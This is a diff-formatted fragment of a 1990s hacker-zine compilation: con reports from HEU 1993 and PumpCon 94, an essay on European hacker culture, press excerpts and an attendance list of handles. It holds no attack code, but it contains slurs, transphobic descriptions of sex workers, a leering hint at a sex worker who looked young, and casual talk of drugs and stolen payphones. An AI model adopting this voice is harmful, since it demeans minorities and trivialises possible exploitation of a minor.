+Wim, and another Dutch Hacker named The Dude sat down to drink.  We were
+joined for a bit by another Dutchman named The Key.  He was totally
+into lock picking, and had a plethora of picks.  (Car masters, traditional
+rakes, tube lock picks, and a weird looking pick for all new model fords.)
+The Key was a large, sinister looking guy who never took off his extremely
+dark sunglasses.  I don't know if it was only for effect, but it certainly
+worked.
+
+I decided it was high time to introduce the Dutch to that quaint American
+custom, Quarters.  We must have gone through some 200 glasses of beer, and
+were extremely loud, drunk and obnoxious.  One woman (I think it was a woman)
+wandered over to us and said, shouldn't you all be on the computers or
+something.  We cursed until she left.
+
+Mr. Miracle invited Carl and I to stay at his place for the rest of the con
+so we wouldn't have to go all the way back to our hotel.  This was a godsend.
+We all piled into The Dude's car for a ride to the apartment that made
+Busch Garden's "Kumba" look like a merry-go-round.  We were quite happy
+to make it home alive.
+
+Xtc was also staying at Mr. Miracle's.  We all spilled onto the floor
+upstairs in his townhouse.  While we were all getting ready to pass out,
+Xtc yakked all over a bathroom.  Needless to say Mr. Miracle and
+his girlfriend were pissed.  We all thought there was going to be a death,
+but somehow Xtc lucked out.
+
+The next morning we all took off over to check out of the Hotel
+Carl and I had rented.  Carl had put some money in their safe.
+Of course, the safe broke, and it took them nearly an hour to destroy
+the safe completely so Carl could retrieve his 300 in traveller's checks.
+Mr. Miracle remarked, "Where's The Key when you need him."
+
+When we finally ended up back at the con, there was a large meeting
+going on about Phone Phreaking.  Emmanuel Goldstein, Bill SF, Rop,
+KCrow (KCROW??) and others were babbling on the panel.  Phiber Optik was
+on a speaker phone adding commentary.  I toyed with the idea of getting
+on the phone and wishing him well and telling him how cool it was in Holland,
+but I decided that would be too mean.
+
+I sat outside the panel listening to everyone complain about the evils
+of the phone company.  Many got up and argued that what they were doing
+was morally right, because the phone company charges too much.  They also
+argued that since the lines were already there they should be able to use
+them for free.  I got disgusted and began yelling about how there were
+chairs in the tent not being used and I wanted my hundred guilders back.
+
+Several people gathered around and I kept ranting.  Mr. Miracle joined
+in on the spree and began challenging just how much Hack-Tic was
+making off of the conference.  He estimated at minimum 500 people
+at 100 guilders a piece.  50000 guilders.  That's a lot of money.
+The crowd gathering around us began questioning the whole situation too.
+It got ugly, but none of us had the balls to say anything about it.
+
+Later that day I sat down to hear Fidelio and RGB give a talk about
+Unix Security.  I had asked them beforehand if they were going to talk
+about anything that I wouldn't know.  (God, afterwards, I realized
+just how snotty that sounded.  I'm a prick.)  It went pretty good
+since most of the people in the crowd weren't gurus and this gave
+them a good overview.
+
+Afterwards, Bill SF was holding a workshop about Wireless LANs.  I was
+thinking this would be a tutorial about wireless lan theory and
+how their security was handled, etc.  WRONG!  Hack-Tic is supposedly
+building a frequency hopping wireless ethernet adaptor.  (Soon to
+be available at a store near you.)
+
+I asked Bill why they went with frequency hopping rather than
+direct sequence.  There are basically two schools of thought about
+spread spectrum, and both have their plusses.  Bill said
+their device would be hard to jam.  I replied that if I pumped
+as little as 1 watt over a particular range, maybe like a 15 Mhz
+range, their device would be just as hosed as anyone else's.
+
+As an afterthought, I hope they build it in the 2.4GHz range, because
+that's the only frequency block that is legal everywhere for
+this type of application.
+
+Sometime later Bill SF was to give a phone phreaking tutorial.  He trudged
+off in the woods to hold a secret workshop.  Unfortunately, I wasn't
+among the privileged audience members, but I hear rumors that the
+Demon Dialer is available for sale.  Sigh.
+
+I have no idea what I did for the next few hours.  I think I was
+abducted by aliens.  The final panel of the evening was a
+social engineering panel being led by The Dude.  Let's just say that
+a European idea of what to use your bullshitting skills for is
+a little bit different than that of your American hacker.
+
+The Dude offered advice like "Say you are with the news or a tv star and
+maybe they will give you a guest account," or "Once I called up and said I
+was doing a story, and they told me information about their computers."
+
+WOW!  Pretty radical stuff.  I remember a certain boy holding up a 7-11 by
+phone.  I remember someone turning my phone into a payphone by bullshitting
+an idiot at the switch.  I remember people getting root passwords from
+system admins by social engineering.  Where were Chasin, RNOC & Supernigger
+when you needed them?  These are the true greats.  I don't know what these
+people at HEU were all excited about, but they all loved it.  Ahhh,
+ignorance IS bliss.
+
+After dark for some reason we were all drawn once again to the quarters
+table.  It was brutal.  They ran out of glasses.  We made pyramids with
+the empties.  We played chandeliers.  We belched, we hollered, we were
+manly men doing manly things, and we mocked those playing computer
+games just a few yards away.  We laughed at them with manly laughs.
+And I don't think anyone threw up that night.
+
+We got a ride home that night from The Key.  He never took off his glasses.
+There are no lights along the highways in Holland.  Luckily I was
+drunk, or I would have been scared shitless.
+
+The final day of the conference we arrived in time to see the "hacking and
+the law" panel.  Emmanuel Goldstein, RGB, Rop, Ray Kaplan, Wietse Venema,
+Andy from the CCC, a Dutch CERT guy and a few others were on the panel.
+It started very well but went sour quickly.  It was supposedly being moderated
+by this asshole of a journalist who apparently didn't understand what it
+meant to moderate.  He would answer EVERY question addressed to the
+panel, whether or not he even knew what the question was about.
+
+This shithead gave journalists a bad name.  Finally this guy got so
+annoying that I finally got up and left.
+
+We decided not to hang out for the party at the end of time.  We figured
+that the party would be much more fun in Amsterdam, so we cut out.  It
+was time to get into the city and cause problems.
+
+EB's Handy Travelling Tip #5:  Don't buy drugs in other countries.
+
+Drugs are illegal in Holland, despite what everyone says.  Despite this
+fact, they are plentiful and every swinging dick on the street has
+a few pills or joints to sell you.  Now the way I looked at it,
+why in the world would you go a zillion miles away to see another
+country and spend your time wasted?
+
+It reminded me of walking in the Height after dark, or going down
+the Drag in Austin a few years back.  Every three steps we took in
+Amsterdam, some joker would run up and say, "You want good smoke?
+Ecstasy?  Cocaine?  You want good coke?  How about some good hashish?"
+I should have asked for DMT, but I just blew everyone off.
+
+On top of all this, there are like 5 or so bars in Amsterdam that
+actually sell hash in the bar.  They are very easy to spot.  They are
+the ones with the pot plants in the window and the tell tale dope smell
+permeating every pore of your body when you walk past.  The big ones
+are the Bulldog and High Times.  Save your money for better things,
+like t-shirts or smut.
+
+At the con, several people were selling "Space Cakes" which were essentially
+hash brownies.  If you've never eaten dope, you might not like it.  It
+comes on slower, lasts longer, and generally puts you to sleep.  This was
+not what I'd want at a Hacker Con.  We needed stimulants, damnit!  I
+drank lots of jolt instead.
+
+EB's Handy Travelling Tip #6:  Go to the Red Light District in Amsterdam.
+
+Even if you are too cheap (or too moral) to shell out the 25 bucks, you
+should go check out the Red Light District.  Be forewarned, all those
+people who tell you that the women are all "so fine" are either fucked up
+or have bad taste.
+
+In the Red Light area the women hang out behind windows in their underwear
+and try to coerce you into sleeping with them by taunting you, flashing you,
+or making other sexual innuendoes.
+
+Unfortunately, the vast majority of these "women" look like out-takes from
+"The Crying Game."  We are talking adam's apples and big hands here.  Large
+boned Asian creatures that scared the shit out of me.  These things were
+NASTY.
+
+Mr. Miracle, Wim and I must have walked around for an hour looking for
+decent women.  Finally we came across two.  TWO.  Out of hundreds, there
+were two.  One was a tall blonde in her twenties.  One was a short, tan
+brunette who looked, uh, young.
+
+17:10.  I'll spare you the details.  Let your imaginations run free.
+
+EB's Handy Travelling Tip #7:  There's no place like home.
+
+I was very happy to hop on that plane back to the USA.  As much as I hate
+to admit it, I really wouldn't know what to do with myself if I didn't
+live in America.
+
+Maybe an England or Australia trip would have been totally different.  It
+really sucked not being able to speak the language.  I also got real
+tired of trying to find food I could eat.  [I gave up red meat almost a
+year ago, and Europeans LOVE THEIR MEAT.  Trying to find chicken was
+a nightmare.  The Dutch word for chicken is KIP.  Remember that.]
+
+The TV sucked, there weren't really any good places for live music,
+the women weren't interested in a scummed-out, long-haired American
+tourist and I missed my cat.  I met some really cool people and
+had a blast for the week I was there, but I was real happy to land
+in the USA.
+
+*Epilogue*
+
+EB's Handy Travelling Tip #8:  If you think customs is going to search you
+                               they won't.
+
+Me, being stupid, left all my good smut in the Netherlands because I was
+afraid I'd get arrested for it.  I envisioned the conversation.  "What are
+you doing with all these nasty things, boy?  You are one sick fucker!
+Lookie here Bob, this here hippy has pictures of gals a pissin' on one
+'nuther."  So what happens?  They smile and wave me through.  Fuck.
+
+*******************************************************************************
+
+Hacking at the End of the Universe
+by Nimrod Kerrett, zzzen@math.tau.ac.il
+
+"A Techno-Anarchist Convention" -- August 3-6, Larserbos, HOLLAND.
+The announcement in Computer Underground Digest committed its viral act,
+erasing all the neatly ordered schedule entries for the first week of
+August from my old, grey memory cells, to be replaced by a neon light
+flashing "You deserve a vacation in Holland." Away we went...
+
+Most of us European/Third-World dwellers don't get to see much of the
+physical manifestations of Gibson's self-executing prophecies. OK. The
+Matrix is there, but to witness street-culture one must live in San
+Francisco or somesuch. HEU -- Hacking at the End of the Universe -- looked
+like the only chance to surface on the physical side of a phone plug and
+experience cyber-culture in form of faces, fashion and body-lang. How naive
+I was to presume this. Compared to most of the kids there, I looked
+dangerous (a timid, Swiss-bank sysadmin)... But don't get me wrong, I DID
+have fun -- failing to do so in Holland requires quite a unique
+body-chemistry -- but I had a nagging feeling that European hackers still
+live in the Seventies.
+
+First, A Few Positive Notes
+
+The most important lecture addressed electronic money. I won't go into
+sci.crypt-style details, but this was the most exciting thing I've ever
+heard since public-keys were first explained to me. The president of a
+Dutch firm called DigiCash described a crypto scheme where a bank can issue
+electronic credit-certificates which can't be forged, and yet are immune to
+traffic analysis. Their digital cash is just like physpace cash: it has no
+smell. You get a "virtual $100 bill" from the bank that you can't forge or
+spend more than once, and which the bank can't trace -- e.g. to the
+specific person who requested it.
+
+Ever since society devolved from cash to credit cards, people have become
+used to the idea that our shopping-histories are readily subject to
+electronic surveillance. At HEU I learned this was all hype: we CAN evolve
+economic systems to enjoy advantages of digital communication without
+sacrificing our privacy.
+
+Another interesting issue was a lecture by an ex-CIA executive who went
+private [ed. note: positively identified as a net.personality on the WELL]
+and now tries to preach for open-source approaches: instead of creating
+your own locks and picking the ones of your neighbor, the idea is to use
+information-gathering/analysis techniques -- one of those things in which
+"intelligence" bodies specialize -- to derive content from the info-swamp
+we seem to be sucked into... and then sell it. This guy made arguments
+similar to what Barlow said before the hush-hush community a few months
+ago, but seems to refocus everything on enterprise. Mighty exciting. BTW,
+I've noticed how the concept of profit makes bleeding-heart European
+anarchist types wince...
+
+The network built onsite also impressed me. In a campground setting,
+subject to occasional rainstorms, they erected three LANS connecting nearly
+100 computers of all sizes and shapes, plus terminal servers for the
+Etherless. Computers were placed in our private tents, and the field
+bloomed with PC/XTs-turned-repeaters covered in wet plastic sheets. This
+monstrosity connected to the Internet over three shaky SLIP dial-up lines
+and it actually WORKED -- it cost some sleepless 36 hours, but still, WOW.
+
+Switch To Poison Ink
+
+Hacker (n) -- (1) One who derives pleasure from making systems do things
+they're not supposed to do. (2) A nerd who does word-processing in
+hexadecimal, is allergic to color or windows and hates being called a
+"user" in ANY context.
+
+Most of the hackers I met at HEU fell under the second definition. I was
+even scolded for using "Wintendo" and wasting the precious power of my 486
+notebook. Let's start with the local network -- having all the tents
+connected was a wonderful idea, and symbolized constructive techno-anarchy.
+Unfortunately it lacked cultural content. To begin with, you had to login
+as a guest -- if you'd figured out the IP number of a server working at the
+moment. You had no identity handle, so there was no use in talking about
+site-specific newsgroup for follow-ups on topics. Even local email was
+impossible; to whom would you email? Since everyone got a badge on
+entrance, why didn't we also receive user-ids, perhaps written on the
+badges? Even administrative announcements (e.g. schedule changes) were only
+available on a PHYSICAL bulletin-board in the bar... ever tried to scan
+manually over 200 paper scraps?
+
+Another side effect was that to justify dragging your portable all the way
+to Holland, you just HAD to hog the SLIP lines and telnet outside, which
+made life hard for all of us, but much harder for the networking crew. In
+my humble opinion, excessive telneting is like saying "Nothing to do here,
+let's try somewhere else." I LIVE somewhere else; I took a plane in order
+to check out THIS place. Telneting was also a problem since the
+IP-resolving system didn't work and we had to apply hacking techniques to
+find the IP numbers back home.
+
+The most frustrating thing was the social/political discussions. In a
+discussion titled "Networking For The Masses" someone dared suggest
+user-friendliness as a key to resolving computer illiteracy. "No shit,
+Sherlock" -- I hear you mumble. Well, here's how another panel-member
+replied: "A revolution is not a user-friendly thing. Activists shouldn't
+count on the computer community to make stuff easier for them". Watch out,
+masses... prepare for computer military-training once the Revolution is
+over.
+
+Let's take another trendy political subject -- cryptography. One would
+assume that any techno-anarchist convention in '93 would feature a nice
+level of heated, political, crypto-discussion. Well, nada. The only
+crypto-related subject was the "electronic cash" mentioned above. Although
+it's quite exciting for the crypto-enlightened, 90% of the HEU audience
+lost contact after the first three cube-roots, returning to their tents to
+telnet elsewhere. I was left in a small group of highly-technical
+Cypherpunks who didn't give a fork whether New Delhi housewives would ever
+understand the switches of PGP; they seem to ENJOY their wizardly "elite"
+status.
+
+Even in discussions about hacker-paranoia, the audience disliked the idea
+of demystifiyng the almighty-hacker image to make your average,
+trigger-happy policeman relax a bit. Does Europe need an equivalent of
+USA's "Operation Sun-Devil" to knock sense into its collective skulls? FTP
+to ftp.eff.org:/pub/cud/papers/crime.puzzle  to learn from the bitter
+experience of others (I don't know the IP number!).
+
+Epi-Travel-Log
+
+Before the convention, I naively believed that at least the HACKERS could
+Read the Writing on the Wall... Since I'm sober now, I'll spell it out for
+you:
+
+When the world finally adopts strong public-key cryptography (I hope it
+does, since I've seen too many wars and acts of human-rights
+infringement in my life), two things will become virtually impossible: 1)
+seeing what you're not supposed to see; and 2) changing what you're not
+supposed to change, unless you want to cause brute-force damage.
+
+These two anachronistic activities represent the basis for most
+hacker-culture I encountered at HEU -- so my advice is: switch to the first
+dictionary-definition of "Hacker". Try being less techno and more
+anarchist. There's a revolution going on... in case you've missed out on
+some Usenet recently.
+
+----
+Reprinted from Fringe Ware Review #2, ISSN 1069-5656.
+Published by FringeWare Inc., fringeware@illuminati.io.com
+Copyright (C)1993, Nimrod Kerrett. All rights reserved.
+
+*******************************************************************************
+
+Hackers Play The Field                                            July 26, 1993
+~~~~~~~~~~~~~~~~~~~~~~
+(Newsweek) (Page 58)
+
+[A Newsweek reporter packs for, and dreams about, HEU in the Netherlands.
+ As you can tell, it was written before the actual con]
+
+There's no guarantee of a large turn-out, but if thousands show up, it may
+help demonstrate how far hacking has moved out of the bedrooms of smelly
+adolescents.  If so, there's likely to be less geeking and more dancing in
+the Dutch summer night.  Programmers may one day be able to lean back from
+their terminals, pat their pocket protectors and say, "I was there."
+
+*******************************************************************************
+
+A Woodstock For Hackers and Phreaks                             August 16, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Barbara Kantrowitz and Joshua Ramo
+
+It was billed as "Woodstock for the Nintendo Generation"  The techno-freaks
+who gathered at the Hackers at the End of the Universe in the Netherlands
+last week had at lease one thing in common with their '60s counterparts:
+they believed rules were made to be broken.
+
+Some were there only electronically, communicating through networks around the
+world.  The rest--the vast majority of them males in their late teens and
+early 20s--gathered in hundreds of multicolored tents clustered around
+power outlets and portable toilets in an area the size of six football fields.
+Many had computer terminals in their tents, with the monitors nestled
+between sleeping bags and guitars.
+
+No one was surprised by the white van bristling with antennas that trolled
+up and down the road leading to the campground.  Everyone seemed to agree
+that it belonged to the Dutch Secret Service; everyone also assumed the
+meeting was being monitored by the CIA and Britain's MI6.  But no one
+knew for sure; paranoia is popular among hackers.
+
+*******************************************************************************
+
+                             Pump Con 94
+
+                       "The Legacy Continues"
+
+                          by Erik Bloodaxe
+
+
+Travelling sucks most of the time.  People like to glamorize it as if
+it's some kind of status unobtainable to the "Average Joe" but
+nine times out of ten its just a pain in the ass.
+
+My trip to Philadelphia for the second PumpCon fell well within the
+aforementioned nine of ten.  I was sick as a dog, coughing up
+large blood-soaked clots of phlegm at a steady pace.  This was
+either due to some undetected immune system failure or due to my
+previous weekend's fiasco which dealt with chemical overindulgence,
+alcohol abuse and some kind of strange creatures that tried to pass
+as female...but that's another story.
+
+(We will assume that my ill-health stemmed from the latter.)
+
+I showed up at the Comfort Inn to find a lobby full of what had to be
+conferees.  (They had been saying to many people they were "Campus
+Crusaders for Christ.")
+
+After checking in I stumbled over to the group to see who was who.
+I introduced myself and asked if Dr. Who or Mark Tabas had showed up.
+They had not.  (And as it turns out, they would never show up.  Dr. Who
+I can forgive since he had no way in from Boston, but Tabas...obviously
+he had better things to do than drive a few miles across town to say
+hello.  Remind me to reciprocate at HoHo Con.)
+
+I was immediately pulled away by GrayAreas and Ophie, who both bestowed
+upon me warnings of impending doom.  Ophie relayed that The Wing had
+told her the previous night that he was going to come to the con and
+"get me."
+
+GrayAreas informed me that an unscrupulous character had been
+asking for me earlier.  After she described him, it was obvious that
+Rogue Agent had made it to the con.  (Unscrupulous...haha)
+
+Up in my room, I dove into my bag of medical goods and felt pity upon
+myself.  Congested, contagious, feverish and now being stalked by
+some unknown person.  Great.  I never much paid any heed to the threats
+given by unknown typists over the net, as people's bravado multiplies
+exponentially in direct proportion to the distance they are separated
+behind a phone or computer screen.  During the week prior to the con
+I had been threatened by at least 2 different people under a variety of
+nicks and addresses.  One promised to crack me over the head with a bat.
+
+I figured with my luck, being sick, this would be the ONE time someone
+would make good on such a promise, as my timing and coordination would
+obviously be impaired.  Swell.
+
+I went on back downstairs to jump in the conversations in the lobby.  The
+group had grown a bit in my absence.  I sat down and began talking to
+Shortwave & C-Curve about ham radio and archaic computer equipment.
+Shortwave offered to send me a Commodore PET to add to the Erik Bloodaxe
+Memorial Computer Archive.  (The EBMCA is a non-profit organization
+devoted to maintaining the history of personal computing.  Our museum
+will open soon.  Hold your breath!)
+
+I then noticed that it appeared that damn near every IRC denizen from the
+Washington DC area was at this damn con.  (sans KL & Strat, but they
+were to appear the following day.)  A bunch of us took off wandering around
+later on to see what the hell was up at some of the other hotels.
+The area was laid out in such a manner that there were like five hotels
+immediately next door to one another with two cheesy restaurants between
+them.
+
+We took off to the Knights Inn and ended up hanging out in the parking
+lot staring at the moon, bullshitting about really lame stuff.  While
+hanging out like retards in the near freezing winds, Dark Tangent came
+over and told us that Zar had been thrown off a bus for the 2nd time
+and was stuck in DC and needed someone to pick him up.  No one wanted to
+road trip it to DC since we were all having SOOO much fun freezing our
+asses off, so Zar had to wait it out for the next bus.
+
+In one room in the Knights Inn a bunch of people were busily smoking
+their brains out.  Their little gathering was dubbed "Hemp-Con."
+
+Finally, sanity rested upon me and I decided that the cold would not
+help nurse me back to health, so I took off back to my room.  Ophie was
+in the room next door to mine with a bunch of people drinking.  Well,
+I think Ophie was doing most of the drinking actually.  :)
+
+I wandered in and gave her a hard time about being drunk.  She responded
+by telling everyone in the room intimate details about her marriage
+and her sexual involvement with the entire DC hacker scene.  Then she
+took off all her clothes and ran around throwing Miniature chocolate
+bars at everyone.  I'm making this up, but she probably wouldn't remember.
+it anyway.  Hehe.
+
+As I went to open my door I noticed that someone had written "DIE NARC"
+on it with a cigarette.  On the floor was the cigarette, a Camel filterless.
+Well, it appeared that The Wing had arrived.  [Oh frabjuous day.  Calloo,
+Callay.  I chortled in my joy.]
+
+Just as I was about to go to bed, people were banging on my door.  When I
+opened it, it looked as if everyone from Ophie's room had staggered over
+for a visit.  One guy in the back, kinda tall, kinda thin, wearing a purple
+shirt, was smoking a Camel stub.  I smiled a him and said, "How's it going?"
+He seemed a bit put off but said, "Do you know who I am?"  I replied, "Of
+course I do Alan, how's it going?"
+
+This seemed to piss him off for some reason.
+
+"You might be all happy tonight, but just wait until tomorrow," he said.
+
+"Oh?" I replied, "you got something in store for me?  Cool.  Could you
+play those Ken Shulman tapes for the con?"
+
+(For those of you who don't know, once upon a time, I had a little company
+called Comsec.  One of my partners was Ken Shulman, a rather complex
+new money piece of @#!*.  Well, things didn't work out with us and Ken
+for a number of reasons, so we fired him.  Ken got mad at us.  He tried to
+fuck over each of us in devious little ways.  To get even, I gave his
+private number out to MOD via the MOD information conduit Renegade Hacker.
+One day, "little shulow" was called up by Wing and Corrupt.  According to
+several people, this call was recorded by MOD.  On this now legendary
+tape, allegedly a disgruntled Shulman proceeded to tell MOD the story
+of how we at Comsec were involved in crimes, drugs and were turning in
+everyone to the feds.  This is the same Ken Shulman who lost his BMW to the
+Houston Police when it was found with 400 hits of X in the trunk, and went
+into seclusion.  But I digress.  I've been trying to get a copy of this
+tape for about two years to see if he said anything actionable about
+Comsec, and to it give to the FBI if he may have been interfering with
+an ongoing federal investigation.  Yes, I do hate him.)
+
+This seemed to make Wing mad too.  I guess I might have spoiled the surprise
+or something.  "I'm not gonna play any tapes so you can sue Shulman."
+
+"Oh, that's too bad." I said.
+
+"Well, I just want you to know, that tomorrow when it happens, you'll know,"
+he said.
+
+"Well, I guess we'll just wait till tomorrow then."
+
+"Yeah, we will."
+
+"Yup. I guess we will."
+
+"You think you're so cool, but YOU'RE A DICK!" he screamed.
+
+Oh great, this is where I get punched.  "Well, it's nice you have
+your opinions."
+
+"YOU'RE A FUCKING DICK!"
+
+Maybe I was supposed to be the one getting mad and doing the punching
+but I wasn't getting anything but tired and was ready to take a shitload
+of aspirin and slam a bottle of night-time cold syrup and antibiotics.
+"Well, I'll see you tomorrow."
+
+By now, I guess everyone had figured out that there would be no
+bloodsport, so someone grabbed Wing and they left.  Ophie yelled
+after him, "Some people are such assholes."
+
+"Well, wasn't that fun," I said to those still hanging around.  "But,
+alas, time for me to get some sleep."  I went down to bum some
+aspirin from Noelle and told her the sordid tale, then went back to my room
+and crashed out.
+
+AND THAT'S THE INFAMOUS ERIKB vs THE WING STORY.  AREN'T YOU EXCITED?
+
+That night, VaxBuster and others tried to get in the electrical box, but
+were thwarted by a concerned citizen.  "I'M GOING DOWN TO THE FRONT DESK
+RIGHT NOW!"
+
+Meanwhile, Sabre sat in the cold all night drinking himself into oblivion
+while keeping a sharp, albeit bloodshot, eye out for potential feds.
+
+The next day everyone congregated in a room at the Red Roof Inn that had
+been rented as the Conference Room.  (How crafty, we'll have it in a
+hotel room, and SAY its a conference room.)
+
+Everyone piled into this room anxious for everything to begin.  We waited.
+And waited.  And waited.  Several newcomers had arrived such as Strat and
+his woman, Dr. Freeze (who used to be the Wizard 703 of rolodex fame.
+Keep on Phreakin!), and Zar who had arranged to get kicked off of his
+3rd bus right near the hotel by slamming a 40 and lighting up
+cigarettes right next to the bus driver.
+
+Finally, after about 7 hours, I figured that maybe I should just go
+say something.  I hopped up and gave a quick and dirty overview of
+commercial packet radio technology.  I talked briefly about RadioMail
+and CDPD, and also talked about EMBARC and demonstrated sucking messages
+out of a Newstream pager.  Then I sent a message from my notebook from ARDIS
+to a Sprintnet gateway, thru an outdial to a dialup to a terminal server
+on the Internet, and from one account mailed myself at RadioMail
+which then sent it back to me on my HP95 over RAM.  I dunno...I thought
+it was cool.
+
+After speaking, I was presented with an award:  an empty porno video box.
+The buttheads didn't even have the decency to give me the tape!
+I put the bible in it instead and placed it back in a drawer.
+
+GreyAreas got up next and talked a bit about her magazine and then
+in a heartfelt plea, asked whoever was bothering her to stop.
+Many in the audience seemed indifferent to her cause, which upset
+her greatly.  She had to leave immediately afterwards.  I hope I
+wasn't the only person who felt kind of sorry for her.
+
+Now, I'm not one to rain on anyone's parade, but kids, fun and games
+on the net are one thing, but the minute you start fucking with people's
+businesses they will go to the FBI.  Remember this.  [Personally,
+I think there are about 4 or 5 specific people on the net who need to
+fucking grow up before they find themselves sharing a cell with Phiber,
+although that seems to be what they want.]
+
+To be fair, people who decide that they want to get on the net need to
+be reminded that THE NET IS NOT REAL!  THE NET IS NOT REAL LIFE.  IF
+THE NET SCARES YOU OR WORRIES YOU, TURN OFF THE FUCKING COMPUTER!  GO
+HANG OUT ON ANOTHER CHANNEL!  GO PLAY ON A MUD!  GO READ NEWS!  If that
+doesn't placate you, go to AOL.
+
+Next up was someone I didn't know, and unfortunately didn't meet.
+But his girlfriend was HOT!  [If he's reading this, tell her I said "hi."]
+
+He gave everyone a rundown of the troubles from last year's Pumpcon.
+I noticed during his recap that the trouble last year didn't really start
+until they all read The Visionary's file.  I suggested that we hold
+a midnight seance and read it aloud so we could all get busted too.
+
+Ixom finally made it to his own con and said a few syllables about
+the folks still waiting to be sentenced from last year.
+
+Up last was VaxBuster who talked about the wonderful world of Blue
+Boxing.  Yes, Virginia, there is a way to box.  People are so silly.
+Obviously I'm not the only one who has looked at CCITT manuals and
+knows signalling frequencies in other countries, or who knows about
+the "International Direct" numbers.  Wow.
+
+After the conference several of us had pizza and got the worst service
+I have ever had in my entire life of dining out.  Grand.  We made up for
+it by amusing ourselves spotting "victims" with laser pointers, laughing
+like idiots as we placed the dots on their foreheads.
+
+Once we got back from chowing, everyone had already begun drinking.
+People were going off to congregate at the conference room for a central
+party location.  As I was leaving to go over there, The Wing walked up
+to me, and said he needed to talk to me.  We went into my room and
+he said he had heard what GrayAreas said earlier in the day, and he wanted
+to say that it wasn't him.  I told him, he needed to tell her that, and
+not me.
+
+I went on to tell him that if he wasn't involved in all the crap going on
+all over the net, then I had no problems with him.  I said he had some
+really poor choices in friends in the past, but hopefully he would
+exercise better judgement in the future.
+
+We all went back over to the conference room.  Wing pulled GrayAreas outside
+to talk to her.  While they were talking, I caught some talk about
+payphones.
+
+[no names from here on]
+
+It seems this guy had a lot of phones and several people too off to go
+buy a few.  They ended up at the lamest party in Pennsylvania.  Four
+people and a keg.  The phones allegedly were sold for 75 bucks and
+were still in the box.  Brand new.
+
+Back at the con, one of the hapless phone buyers decided to take his phone
+up to the conference room to show it off.  Once there, everyone giggled
+and gawked over it, and then he took it back down to put it in a car.  On the
+way there, a cop grabbed him and arrested him.  The cop then searched
+the car he was about to put it in and found some pot and arrested the
+car's owner too and had the car impounded.
+
+[anonymous portion ends]
+
+Now the cops converged on the conference room and began hounding people
+in there.  One wonderful cop discovered my Porno-Bible creation and
+screamed at the crowd, "You heathens!  How could you do something like this?
+You people are sick!"
+
+Ixom, ready for a fight, began yelling at the chief of police over the phone.
+The police chief told him that maybe he would like for the nice officers
+to bring him downtown to go over his complaints.  Ixom decided that
+would not be necessary.
+
+After the police interaction, people scattered from the conference room
+back to their individual rooms.  No sooner than they got there, the police
+decided to investigate a "few noise complaints" at the Comfort Inn.
+Ophie's room, the Dope Room on the 1st floor and a few others got searched.
+
+While all of this mayhem was ensuing in the outside world, I was up in my
+little room being interviewed by GrayAreas for her magazine.  This was
+probably the longest interview I've ever done.  I hope I don't turn out
+looking like a bigger fuckhead in it than I already am.
+
+After the interview, I got the story of all the police interaction from
+the throngs of people who gathered outside my room.  A few people
+remarked, "how come YOUR room didn't get searched?"  I didn't have an
+answer for that, except maybe because it was paid on a corporate AmEx
+and might not have looked like a "hacker" was in there.  (No, it was
+because I work for the government...just ask Agent Steal.  Geez.)
+
+After this mess I went to bed.  Yup.
+
+The following morning while waiting to get a table at Denny's, we noticed
+that the old dudes with the beer were going into the "conference room"
+and taking stuff out.  A bunch of the crew ran over there to check it
+out and guess what?  The old guys weren't just any bunch of drunken
+old dudes, they were the Pennsylvania State Police's Computer Crime
+Division.  They had been staking out the conference from the room next
+door and had listened in to everything.  Rad.  Two years and running.
+Maybe next year the CIA and NSA will want to stake it out too.  I can't
+wait.
+
+Then I went home.
+
+*******************************************************************************
+
+                - Top 10 things learned at PumpCon -
+                           - The Wink -
+
+10) Hotel's don't like over 40 people in their lobby
+
+9)  Its not Ma'am, its Doris
+
+8)  "GrayArea has quite a few gray areas"
+
+7)  Greyhound hates Zar
+
+6)  Who needs speakers who show up?
+
+5)  SnatchBuster !
+
+4)  "You heathens, how can you put the Holy Bible in a pornographic
+    movie case !"
+
+3)  Geezer Narc !
+
+2)  Don't put condor and erikb in the same space
+
+1)  Don't carry open payphones around the con
+
+*******************************************************************************
+
+                        P U M P  C O N  ][
+
+                     Informal Attendance List
+
+<Disclaimer> I cranked this thing out over the weekend, and some people I
+know were there, but I didn't get their names.  Some people might be listed
+twice.  It's up to you to figure it out.
+
+As we were waiting for people to arrive we came up with a lameness scale.  If
+you got a "+l" that mean you got a lame point for saying someone's real name
+or info.  Basically spouting off real stuff to people who shouldn't hear it.
+Sure it's easy when you all know each other, but if I was really trying I would
+have generated so much real data on people it would be scary.  On the other
+hand if you were real slick and tricky, you got a "+e", or elite point.  As
+more and more people showed up I stopped doing this 'cuz we all broke up and
+only the people I was around would have to suffer the wrath of the +l.  Think
+of it as a security rating.  The more +l the easier it was to get info out of
+people.
+
+The List is in the order of when I ran into people.  Basically the first half
+is in chronological order, but after that I lost track and got names when I
+could.
+
+ Grayarea
+ Noe11e (Yes, she exists)
+ Okinawa (+e)
+ Reive (assigned to Fed-Man)
+ Ophie (+l+l+l+l+l+l.. you get the idea)
+ Lgas (+l)
+ Loki (+l, but he was trying hard..)
+ Jello Man
+ Evak
+ CarlCory
+ SubEthan (+l)
+ Bernie S. (+l, Elite handset dude)
+ Jamie
+ DRobinson
+ iXom (5 hours late)
+ Nick-O (+e, worked that stewardess)
+ FreeJack
+ MadCap (With the elite hat)
+ Condor
+ Jay Farnam
+ ShortWave
+ ErikB (+e, good speech)
+ C-Curve (+e)
+ Cuttle Fish
+ Vax Buster (+e+e for protecting personal data, Good speech)
+ Syntor
+ LudiChrist (+l,+e for evading officers)
+ Optic Nerve
+ Scourge (+l)
+ Great One (+l, +e for staying cool at police station)
+ Dave (+l+l, Don't use your real name)
+ Phil (+l+l, what's this, Real Name con?)
+ Juanka (+l This guy was acting strange..)
+ Rogue
+ NtStriker (+e for being shot by the police)
+ Wierdo
+ DreamScriber
+ Randy S. Hacker (+e for cool car and free beer)
+ Count Zero
+ Typhoid Mary (She locked onto TaquilaHeadPaint)
+ Ragent
+ The Wing
+ Stranger (+l for believing NtStriker was shot)
+ RedAlert
+ Zar (+l for getting kicked off three busses)
+ Dr. Freeze
+ Strat
+ Anonymous Caller
+ KL (+e for staying at the Knights Inn)
+ Mad Dog
+ Odd Ball
+ Hoog
+ Decimator (+l, real name)
+ Time Lord (+e, good speech)
+ Albatross
+ Saber
+ Tristan
+ Grimm
+ Male Havoc
+ MrG (+l+l for getting arrested, +e for not narking)
+ The Dark Tangent (+l, for making this list)
\ No newline at end of file
